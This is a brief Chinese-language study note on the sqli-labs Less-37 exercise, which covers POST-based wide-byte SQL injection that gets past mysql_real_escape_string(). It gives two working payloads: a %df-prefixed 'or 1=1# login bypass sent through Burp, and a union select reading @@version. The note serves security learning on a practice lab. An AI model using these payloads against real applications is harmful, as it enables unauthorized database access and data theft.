Less37【post方式宽字节注入】
Less37与less34注入方式一致,唯一不同点在less37利用mysql_real_escape_string()拦截注入
法1:Bp修改(默认浏览器会将所有能url编码的符号全部编码)
uname=123%df'or 1=1#&passwd=&submit=Submit
法2:特殊符号(优先对%df解码)
123�' union select @@version,2#
___________________________________________________________________________________________没有白跑的路